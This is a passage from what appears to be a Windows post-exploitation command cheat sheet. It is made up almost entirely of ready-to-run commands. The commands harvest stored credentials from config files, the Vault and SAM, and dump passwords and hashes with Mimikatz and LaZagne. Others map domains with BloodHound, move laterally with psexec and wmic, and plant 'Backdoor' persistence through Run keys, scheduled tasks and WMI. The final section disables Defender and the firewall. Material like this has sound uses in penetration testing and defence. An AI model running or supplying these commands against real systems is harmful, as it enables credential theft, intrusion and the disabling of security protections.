reg query "HKCU\Software\Microsoft\Terminal Server Client\Default" /v MR*
## IIS application pool credentials
type %windir%\system32\inetsrv\config\applicationHost.config | findstr /i "password"
type C:\inetpub\wwwroot\web.config | findstr /i "password"
## SQL connection strings
dir /s /b *.config | findstr /i web.config
findstr /S /I "connectionString" *.config
findstr /S /I "password" *.config | findstr /v "//"
## Windows Vault
reg query "HKCU\Software\Microsoft\Vault"
reg query "HKCU\Software\Microsoft\Vault\Capabilities"
reg query "HKCU\Software\Microsoft\Vault\GenericCredentials"
Tools & Frameworks Enumeration
Comprehensive enumeration tools and frameworks including PowerShell modules, third-party tools, automated scanners, and specialized enumeration suites.
Complete PowerShell Enumeration Modules
# Complete PowerShell enumeration modules
## Local system PowerShell
Get-LocalUser
Get-LocalGroup
Get-LocalGroupMember Administrators
Get-Process | Select-Object Name,Id,CPU,WorkingSet,Path,StartTime,Company,ProductVersion
Get-Service | Select-Object Name,DisplayName,Status,StartType
Get-ScheduledTask | Select-Object TaskName,TaskPath,State
Get-NetIPConfiguration
Get-NetFirewallRule | Select-Object Name,Enabled,DisplayName,Description
## WMI PowerShell
Get-WmiObject -Class Win32_ComputerSystem
Get-WmiObject -Class Win32_OperatingSystem
Get-WmiObject -Class Win32_UserAccount
Get-WmiObject -Class Win32_Group
Get-WmiObject -Class Win32_Service
Get-WmiObject -Class Win32_Process
Get-WmiObject -Class Win32_Product
## Network PowerShell
Get-NetTCPConnection | Select-Object LocalAddress,LocalPort,RemoteAddress,RemotePort,State,OwningProcess
Get-NetUDPEndpoint | Select-Object LocalAddress,LocalPort,OwningProcess
Get-NetRoute | Select-Object DestinationPrefix,NextHop,RouteMetric,InterfaceAlias
Get-DnsClientCache
## File system PowerShell
Get-ChildItem -Path C:\ -Include *.txt,*.config,*.xml,*.ini,*.conf -File -Recurse -ErrorAction SilentlyContinue | Select-Object FullName
Get-ChildItem -Path C:\Users\* -Include *.txt,*.config,*.xml,*.ini,*.conf -File -Recurse -ErrorAction SilentlyContinue | Select-Object FullName
Get-ChildItem -Path C:\Windows\System32\config\SAM -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Windows\repair\SAM -ErrorAction SilentlyContinue
Complete Third-Party Tools
# Complete third-party tools enumeration
## PowerSploit
Get-ComputerInfo
Get-NetDomain
Get-NetUser
Get-NetGroup
Get-NetComputer
Get-NetShare
Get-NetSession
Get-NetLoggedon
Get-NetProcess
Find-DomainShare
Get-DomainGPO
Get-DomainTrust
## BloodHound
bloodhound-python -d <domain> -u <username> -p <password> -c All
SharpHound.exe --CollectionMethods All --Domain <domain> --ZipFileName output.zip
Invoke-BloodHound -CollectionMethod All -Domain <domain> -ZipFileName output.zip
## Seatbelt
Seatbelt.exe -group=all
Seatbelt.exe -group=system
Seatbelt.exe -group=user
Seatbelt.exe -group=process
Seatbelt.exe -group=network
Seatbelt.exe -group=antivirus
Seatbelt.exe AMSIBypass
Seatbelt.exe TokenPrivileges
Seatbelt.exe UAC
Seatbelt.exe PowerShell
## WinPEAS
winpeas.exe
winpeas.exe quiet
winpeas.exe quiet systeminfo
winpeas.exe quiet processinfo
winpeas.exe quiet servicesinfo
winpeas.exe quiet applicationsinfo
winpeas.exe quiet networkinfo
winpeas.exe quiet windowscreds
winpeas.exe quiet filesinfo
## JAWS
jaws-enum.ps1
Invoke-JAWS
## Sherlock
Find-AllVulns
Find-MS14058
Find-MS15051
Find-MS16032
Find-MS16135
Find-CVE20178199
## Mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
lsadump::secrets
token::elevate
vault::list
crypto::certificates
sekurlsa::tickets
kerberos::list
lsadump::dcsync
## LaZagne
laZagne.exe all
laZagne.exe browsers
laZagne.exe wifi
laZagne.exe sysadmin
laZagne.exe mails
laZagne.exe chats
laZagne.exe databases
laZagne.exe games
Advanced Techniques
Advanced enumeration techniques including lateral movement, persistence mechanisms, and defensive evasion.
Advanced Enumeration Commands
# Advanced enumeration techniques
## Lateral Movement
psexec.exe \\<target> cmd.exe
wmic /node:<target> process call create "cmd.exe"
schtasks /create /tn "TaskName" /tr "C:\shell.exe" /sc once /st 00:00 /S <target> /RU System
sc.exe \\<target> create ServiceName binPath= "C:\shell.exe" start= auto
## Persistence Mechanisms
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\shell.exe" /f
schtasks /create /tn "Backdoor" /tr "C:\shell.exe" /sc minute /mo 1 /ru SYSTEM
wmic /namespace:\\root\subscription path __EventFilter create Name="Backdoor", EventNamespace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
## Defensive Evasion
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
netsh advfirewall set allprofiles state off
reg add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v Start /t REG_DWORD /d 4 /f
taskkill /f /im MsMpEng.exe